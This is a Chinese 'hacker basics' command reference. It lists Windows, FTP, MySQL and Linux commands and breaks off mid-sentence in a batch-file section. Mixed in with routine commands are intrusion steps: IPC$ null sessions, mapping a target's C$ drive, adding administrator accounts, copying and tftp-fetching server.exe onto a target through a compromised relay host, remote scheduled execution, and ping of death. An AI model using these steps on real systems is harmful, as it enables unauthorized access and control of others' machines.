dos命令 大全.doc

黑客基礎(chǔ)之DOS大全 netuse$ipipc$/user:建立IPC空鏈接 netuse$ipipc$密碼/user:用戶名建立IPC非空鏈接 netuseh:$ipc$密碼/user:用戶名直接登陸后映射對方C：到本地為H: netuseh:$ipc$登陸后映射對方C：到本地為H: netuse$ipipc$/del刪除IPC鏈接 netuseh:/del刪除映射對方到本地的為H:的映射 netuser用戶名密碼/add建立用戶 netuserguest/active:yes激活guest用戶 netuser查看有哪些用戶 netuser帳戶名查看帳戶的屬性 netlocalgroupadministrators用戶名/add把“用戶”添加到管理員中使其具有管理員權(quán)限,注意：administrator后加s用復(fù)數(shù) netstart查看開啟了哪些服務(wù) netstart服務(wù)名開啟服務(wù)；(如:netstarttelnet，netstartschedule) netstop服務(wù)名停止某服務(wù) nettime目標ip查看對方時間 nettime目標ip/set設(shè)置本地計算機時間與“目標IP”主機的時間同步,加上參數(shù)/yes可取消確認信息 netview查看本地局域網(wǎng)內(nèi)開啟了哪些共享 netviewip查看對方局域網(wǎng)內(nèi)開啟了哪些共享 netconfig顯示系統(tǒng)網(wǎng)絡(luò)設(shè)置 netlogoff斷開連接的共享 netpause服務(wù)名暫停某服務(wù) netsendip文本信息向?qū)Ψ桨l(fā)信息 netver局域網(wǎng)內(nèi)正在使用的網(wǎng)絡(luò)連接類型和信息 netshare查看本地開啟的共享 netshareipc$開啟ipc$共享 netshareipc$/del刪除ipc$共享 netsharec$/del刪除C：共享 netuserguest12345用guest用戶登陸后用將密碼改為12345 netpassword密碼更改系統(tǒng)登陸密碼 netstat-a查看開啟了哪些端口,常用netstat-an netstat-n查看端口的網(wǎng)絡(luò)連接情況，常用netstat-an netstat-v查看正在進行的工作 netstat-p協(xié)議名例：netstat-ptcq/ip查看某協(xié)議使用情況（查看tcp/ip協(xié)議使用情況） netstat-s查看正在使用的所有協(xié)議使用情況 nbtstat-Aip對方136到139其中一個端口開了的話，就可查看對方最近登陸的用戶名（03前的為用戶名）-注意：參數(shù)-A要大寫 tracert-參數(shù)ip(或計算機名)跟蹤路由（數(shù)據(jù)包），參數(shù)：“-w數(shù)字”用于設(shè)置超時間隔。 pingip(或域名)向?qū)Ψ街鳈C發(fā)送默認大小為32字節(jié)的數(shù)據(jù)，參數(shù)：“-l空格數(shù)據(jù)包大小”；“-n發(fā)送數(shù)據(jù)次數(shù)”；“-t”指一直ping。 ping-t-l65550ip死亡之ping(發(fā)送大于64K的文件并一直ping就成了死亡之ping) ipconfig(winipcfg)用于windowsNT及XP(windows9598)查看本地ip地址，ipconfig可用參數(shù)“/all”顯示全部配置信息 tlist-t以樹行列表顯示進程(為系統(tǒng)的附加工具，默認是沒有安裝的，在安裝目錄的Support/tools文件夾內(nèi)) kill-F進程名加-F參數(shù)后強制結(jié)束某進程(為系統(tǒng)的附加工具，默認是沒有安裝的，在安裝目錄的Support/tools文件夾內(nèi)) del-F文件名加-F參數(shù)后就可刪除只讀文件,/AR、/AH、/AS、/AA分別表示刪除只讀、隱藏、系統(tǒng)、存檔文件，/A-R、/A-H、/A-S、/A-A表示刪除除只讀、隱藏、系統(tǒng)、存檔以外的文件。例如“DEL/AR*.*”表示刪除當前目錄下所有只讀文件，“DEL/A-S*.*”表示刪除當前目錄下除系統(tǒng)文件以外的所有文件 del/S/Q目錄或用：rmdir/s/Q目錄/S刪除目錄及目錄下的所有子目錄和文件。同時使用參數(shù)/Q可取消刪除操作時的系統(tǒng)確認就直接刪除。（二個命令作用相同） move盤符路徑要移動的文件名存放移動文件的路徑移動后文件名移動文件,用參數(shù)/y將取消確認移動目錄存在相同文件的提示就直接覆蓋 fcone.txttwo.txt3st.txt對比二個文件并把不同之處輸出到3st.txt文件中，和是重定向命令 atid號開啟已注冊的某個計劃任務(wù) at/delete停止所有計劃任務(wù)，用參數(shù)/yes則不需要確認就直接停止 atid號/delete停止某個已注冊的計劃任務(wù) at查看所有的計劃任務(wù) atiptime程序名(或一個命令)/r在某時間運行對方某程序并重新啟動計算機 fingerusernamehost查看最近有哪些用戶登陸 telnetip端口遠和登陸服務(wù)器,默認端口為23 openip連接到IP（屬telnet登陸后的命令） telnet在本機上直接鍵入telnet將進入本機的telnet copy路徑文件名1路徑文件名2/y復(fù)制文件1到指定的目錄為文件2，用參數(shù)/y就同時取消確認你要改寫一份現(xiàn)存目錄文件 copyc:srv.exe$ipadmin$復(fù)制本地c:srv.exe到對方的admin下 cppy1st.jpg/b+2st.txt/a3st.jpg將2st.txt的內(nèi)容藏身到1st.jpg中生成3st.jpg新的文件，注：2st.txt文件頭要空三排，參數(shù)：/b指二進制文件，/a指ASCLL格式文件 copy$svv.exeipadmin$svv.exec:或:copyipadmin$*.*復(fù)制對方admini$共享下的srv.exe文件（所有文件）至本地C： xcopy要復(fù)制的文件或目錄樹目標地址目錄名復(fù)制文件和目錄樹，用參數(shù)/Y將不提示覆蓋相同文件 tftp-i自己IP(用肉機作跳板時這用肉機IP)getserver.exec:server.exe登陸后，將“IP”的server.exe下載到目標主機c:server.exe參數(shù)：-i指以二進制模式傳送，如傳送exe文件時用，如不加-i則以ASCII模式（傳送文本文件模式）進行傳送 tftp-i對方IPputc:server.exe登陸后，上傳本地c:server.exe至主機 ftpip端口用于上傳文件至服務(wù)器或進行文件操作，默認端口為21。bin指用二進制方式傳送（可執(zhí)行文件進）；默認為ASCII格式傳送(文本文件時) routeprint顯示出IP路由，將主要顯示網(wǎng)絡(luò)地址Networkaddres，子網(wǎng)掩碼Netmask，網(wǎng)關(guān)地址Gatewayaddres，接口地址Interface arp查看和處理ARP緩存，ARP是名字解析的意思，負責把一個IP解析成一個物理性的MAC地址。arp-a將顯示出全部信息 start程序名或命令/max或/min新開一個新窗口并最大化（最小化）運行某程序或命令 mem查看cpu使用情況 attrib文件名(目錄名)查看某文件（目錄）的屬性 attrib文件名-A-R-S-H或+A+R+S+H去掉(添加)某文件的存檔，只讀，系統(tǒng)，隱藏屬性；用則是添加為某屬性 dir查看文件，參數(shù)：/Q顯示文件及目錄屬系統(tǒng)哪個用戶，/T:C顯示文件創(chuàng)建時間，/T:A顯示文件上次被訪問時間，/T:W上次被修改時間 date/t、time/t使用此參數(shù)即“DATE/T”、“TIME/T”將只顯示當前日期和時間，而不必輸入新日期和時間 set指定環(huán)境變量名稱=要指派給變量的字符設(shè)置環(huán)境變量 set顯示當前所有的環(huán)境變量 setp(或其它字符)顯示出當前以字符p(或其它字符)開頭的所有環(huán)境變量 pause暫停批處理程序，并顯示出：請按任意鍵繼續(xù). if在批處理程序中執(zhí)行條件處理（更多說明見if命令及變量） goto標簽將cmd.exe導(dǎo)向到批處理程序中帶標簽的行（標簽必須單獨一行，且以冒號打頭，例如：“：start”標簽） call路徑批處理文件名從批處理程序中調(diào)用另一個批處理程序（更多說明見call/?） for對一組文件中的每一個文件執(zhí)行某個特定命令（更多說明見for命令及變量） echoon或off打開或關(guān)閉echo，僅用echo不加參數(shù)則顯示當前echo設(shè)置 echo信息在屏幕上顯示出信息 echo信息pass.txt將信息保存到pass.txt文件中 findstrHelloaa.txt在aa.txt文件中尋找字符串hello find文件名查找某文件 title標題名字更改CMD窗口標題名字 color顏色值設(shè)置cmd控制臺前景和背景顏色；0黑、1藍、2綠、3淺綠、4紅、5紫、6黃、7=白、8=灰、9=淡藍、A淡綠、B=淡淺綠、C=淡紅、D=淡紫、E=淡黃、F=亮白prompt名稱更改cmd.exe的顯示的命令提示符(把C:、D:統(tǒng)一改為：EntSky) print文件名打印文本文件 ver在DOS窗口下顯示版本信息 winver彈出一個窗口顯示版本信息（內(nèi)存大小、系統(tǒng)版本、補丁版本、計算機名） format盤符/FS:類型格式化磁盤,類型:FAT、FAT32、NTFS,例：FormatD:/FS:NTFS md目錄名創(chuàng)建目錄 replace源文件要替換文件的目錄替換文件 ren原文件名新文件名重命名文件名 tree以樹形結(jié)構(gòu)顯示出目錄，用參數(shù)-f將列出第個文件夾中文件名稱 type文件名顯示文本文件的內(nèi)容 more文件名逐屏顯示輸出文件 doskey要鎖定的命令字符 doskey要解鎖命令=為DOS提供的鎖定命令(編輯命令行，重新調(diào)用win2k命令，并創(chuàng)建宏)。如：鎖定dir命令：doskeydir=entsky(不能用doskeydir=dir)；解鎖：doskeydir= taskmgr調(diào)出任務(wù)管理器 chkdsk/FD:檢查磁盤D并顯示狀態(tài)報告；加參數(shù)/f并修復(fù)磁盤上的錯誤 tlntadmntelnt服務(wù)admn,鍵入tlntadmn選擇3，再選擇8,就可以更改telnet服務(wù)默認端口23為其它任何端口 exit退出cmd.exe程序或目前，用參數(shù)/B則是退出當前批處理腳本而不是cmd.exe path路徑可執(zhí)行文件的文件名為可執(zhí)行文件設(shè)置一個路徑。 cmd啟動一個win2K命令解釋窗口。參數(shù)：/eff、/en關(guān)閉、開啟命令擴展；更我詳細說明見cmd/? regedit/s注冊表文件名導(dǎo)入注冊表；參數(shù)/S指安靜模式導(dǎo)入，無任何提示； regedit/e注冊表文件名導(dǎo)出注冊表 cacls文件名參數(shù)顯示或修改文件訪問控制列表（ACL）針對NTFS格式時。參數(shù)：/D用戶名:設(shè)定拒絕某用戶訪問；/P用戶名:perm替換指定用戶的訪問權(quán)限；/G用戶名:perm賦予指定用戶訪問權(quán)限；Perm可以是:N無，R讀取，W寫入，C更改(寫入)，F(xiàn)完全控制；例：caclsD:test.txt/Dpub設(shè)定d:test.txt拒絕pub用戶訪問。 cacls文件名查看文件的訪問用戶權(quán)限列表 REM文本內(nèi)容在批處理文件中添加注解 netsh查看或更改本地網(wǎng)絡(luò)配置情況 IIS服務(wù)命令： iisreset/reboot重啟win2k計算機（但有提示系統(tǒng)將重啟信息出現(xiàn)） iisreset/start或stop啟動（停止）所有Internet服務(wù) iisreset/restart停止然后重新啟動所有Internet服務(wù) iisreset/status顯示所有Internet服務(wù)狀態(tài) iisreset/enable或disable在本地系統(tǒng)上啟用（禁用）Internet服務(wù)的重新啟動 iisreset/rebootonerror當啟動、停止或重新啟動Internet服務(wù)時，若發(fā)生錯誤將重新開機 iisreset/noforce若無法停止Internet服務(wù)，將不會強制終止Internet服務(wù) iisreset/timeoutVal在到達逾時間（秒）時，仍未停止Internet服務(wù)，若指定/rebootonerror參數(shù)，則電腦將會重新開機。預(yù)設(shè)值為重新啟動20秒，停止60秒，重新開機0秒。 FTP命令：(后面有詳細說明內(nèi)容) ftp的命令行格式為: ftpvding主機名v顯示遠程服務(wù)器的所有響應(yīng)信息。 d使用調(diào)試方式。 n限制ftp的自動登錄,即不使用.netrc文件。 g取消全局文件名。 help命令或？命令查看命令說明 bye或quit終止主機FTP進程,并退出FTP管理方式. pwd列出當前遠端主機目錄 put或send本地文件名上傳到主機上的文件名將本地一個文件傳送至遠端主機中 get或recv遠程主機文件名下載到本地后的文件名從遠端主機中傳送至本地主機中 mgetremote-files從遠端主機接收一批文件至本地主機 mputlocal-files將本地主機中一批文件傳送至遠端主機 dir或lsremote-directorylocal-file列出當前遠端主機目錄中的文件.如果有本地文件,就將結(jié)果寫至本地文件 ascii設(shè)定以ASCII方式傳送文件(缺省值) bin或image設(shè)定以二進制方式傳送文件 bell每完成一次文件傳送,報警提示 cdup返回上一級目錄 close中斷與遠程服務(wù)器的ftp會話(與open對應(yīng)) openhostport建立指定ftp服務(wù)器連接,可指定連接端口 delete刪除遠端主機中的文件 mdeleteremote-files刪除一批文件 mkdirdirectory-name在遠端主機中建立目錄 renamefromto改變遠端主機中的文件名 rmdirdirectory-name刪除遠端主機中的目錄 status顯示當前FTP的狀態(tài) system顯示遠端主機系統(tǒng)類型 useruser-namepasswordaccount重新以別的用戶名登錄遠端主機 openhostport重新建立一個新的連接 prompt交互提示模式 macdef定義宏命令 lcd改變當前本地主機的工作目錄,如果缺省,就轉(zhuǎn)到當前用戶的HOME目錄 chmod改變遠端主機的文件權(quán)限 case當為ON時,用MGET命令拷貝的文件名到本地機器中,全部轉(zhuǎn)換為小寫字母 cdremotedir進入遠程主機目錄 cdup進入遠程主機目錄的父目錄 !在本地機中執(zhí)行交互shell，exit回到ftp環(huán)境,如!ls.zip MYSQL命令： mysql-h主機地址-u用戶名p密碼連接MYSQL;如果剛安裝好MYSQL，超級用戶root是沒有密碼的。 （例：mysql-h10-Uroot-P123456 注:u與root可以不用加空格，其它也一樣） exit退出MYSQL mysqladmin-u用戶名-p舊密碼password新密碼修改密碼 grantselecton數(shù)據(jù)庫.*to用戶名登錄主機identifiedby密碼;增加新用戶。（注意：和上面不同，下面的因為是MYSQL環(huán)境中的命令，所以后面都帶一個分號作為命令結(jié)束符） showdatabases;顯示數(shù)據(jù)庫列表。剛開始時才兩個數(shù)據(jù)庫：mysql和test。mysql庫很重要它里面有MYSQL的系統(tǒng)信息，我們改密碼和新增用戶，實際上就是用這個庫進行操作。 usemysql； showtables;顯示庫中的數(shù)據(jù)表 describe表名;顯示數(shù)據(jù)表的結(jié)構(gòu) createdatabase庫名;建庫 use庫名； createtable表名(字段設(shè)定列表)；建表 dropdatabase庫名; droptable表名；刪庫和刪表 deletefrom表名;將表中記錄清空 select*from表名;顯示表中的記錄 mysqldump-optschoolschool.bbb備份數(shù)據(jù)庫：（命令在DOS的mysqlbin目錄下執(zhí)行）;注釋:將數(shù)據(jù)庫school備份到school.bbb文件，school.bbb是一個文本文件，文件名任取，打開看看你會有新發(fā)現(xiàn)。 win2003系統(tǒng)下新增命令（實用部份）： shutdown/參數(shù)關(guān)閉或重啟本地或遠程主機。 參數(shù)說明：/S關(guān)閉主機，/R重啟主機，/T數(shù)字設(shè)定延時的時間，范圍0180秒之間，/A取消開機，/M/IP指定的遠程主機。 例：shutdown/r/t0立即重啟本地主機（無延時） taskill/參數(shù)進程名或進程的pid終止一個或多個任務(wù)和進程。 參數(shù)說明：/PID要終止進程的pid,可用tasklist命令獲得各進程的pid，/IM要終止的進程的進程名，/F強制終止進程，/T終止指定的進程及他所啟動的子進程。 tasklist顯示當前運行在本地和遠程主機上的進程、服務(wù)、服務(wù)各進程的進程標識符(PID)。 參數(shù)說明：/M列出當前進程加載的dll文件，/SVC顯示出每個進程對應(yīng)的服務(wù)，無參數(shù)時就只列出當前的進程。 Linux系統(tǒng)下基本命令：要區(qū)分大小寫 uname顯示版本信息（同win2K的ver） dir顯示當前目錄文件,ls-al顯示包括隱藏文件（同win2K的dir） pwd查詢當前所在的目錄位置 cdcd.回到上一層目錄，注意cd與.之間有空格。cd/返回到根目錄。 cat文件名查看文件內(nèi)容 catabc.txt往abc.txt文件中寫上內(nèi)容。 more文件名以一頁一頁的方式顯示一個文本文件。 cp復(fù)制文件 mv移動文件 rm文件名刪除文件，rm-a目錄名刪除目錄及子目錄 mkdir目錄名建立目錄 rmdir刪除子目錄，目錄內(nèi)沒有文檔。 chmod設(shè)定檔案或目錄的存取權(quán)限 grep在檔案中查找字符串 diff檔案文件比較 find檔案搜尋 date現(xiàn)在的日期、時間 who查詢目前和你使用同一臺機器的人以及Login時間地點 w查詢目前上機者的詳細資料 whoami查看自己的帳號名稱 groups查看某人的Group passwd更改密碼 history查看自己下過的命令 ps顯示進程狀態(tài) kill停止某進程 gcc黑客通常用它來編譯C語言寫的文件 su權(quán)限轉(zhuǎn)換為指定使用者 telnetIPtelnet連接對方主機（同win2K），當出現(xiàn)bash$時就說明連接成功。 ftpftp連接上某服務(wù)器（同win2K） 附：批處理命令與變量 1：for命令及變量基本格式： FOR/參數(shù)%variableIN(set)DOcommandcommand_parameters%variable:指定一個單一字母可替換的參數(shù)，如：%i，而指定一個變量則用：%i，而調(diào)用變量時用：%i%，變量是區(qū)分大小寫的（%i不等于%I）。 批處理每次能處理的變量從%0%9共10個，其中%0默認給批處理文件名使用，%1默認為使用此批處理時輸入的的第一個值，同理：%2%9指輸入的第2-9個值；例：netuse$ipipc$pass/user:user中ip為%1,pa